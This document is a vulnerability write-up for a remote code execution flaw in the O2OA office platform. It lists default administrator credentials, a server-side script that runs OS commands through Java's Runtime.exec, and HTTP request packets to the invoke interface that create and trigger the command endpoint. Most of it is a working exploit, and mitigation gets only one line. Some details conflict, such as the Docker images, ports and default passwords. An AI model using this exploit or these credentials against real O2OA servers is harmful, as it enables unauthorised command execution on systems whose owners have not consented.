Vulnerability Overview
O2OA is a free and open-source enterprise and team office platform that provides four major platforms: portal management, process management, information management, and data management. It offers various functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration to meet the management and collaboration needs of enterprises. The O2OA system has a remote code execution vulnerability in the invoke interface. Attackers can exploit this vulnerability to execute arbitrary code.
Scope of Impact
Title: "O2OA"
CNVD-2020-18740
Exploitation Process
Pull the environment using Docker
docker pull oxnme/o2oa:6.1.3
docker run --name o2server -p 80:80 -p 20010:20010 -p 20020:20020 -p 20030:20030 -d o2oa/o2server
Weak password: xadmin/o2oa@2022
After setting up the environment, directly access port 8001 through a browser to automatically jump to the O2OA login page
http://192.168.31.151:8001/x_desktop/index.html
Enter the default password, xadmin/o2, to log in successfully.
Note: The default password for the new version of O2OA is: xadmin/o2oa@2022
Find service management
Add interface configuration
Enter the content of the execution command as follows.
var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream()));
var result = [];
while (true) {
var oneline = bufReader.readLine();
result.push(oneline);
if (!oneline) break;
}
var result = { "Result": result };
this.response.setBody(result, "application/json");
Interface configuration can also be created through the following request packet.
The request packet is as follows:
POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Authorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA
{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n var oneline = bufReader.readLine();\n result.push(oneline);\n if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}
Execute the command directly.
The request packet is as follows:
POST 192.168.31.151:20030/x_program_center/jaxrs/invoke/cmd/execute
Authorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA
{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n var oneline = bufReader.readLine();\n result.push(oneline);\n if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}
Different commands require creating different interface configurations.
Recommendations for Fixing
Upgrade the version
Reference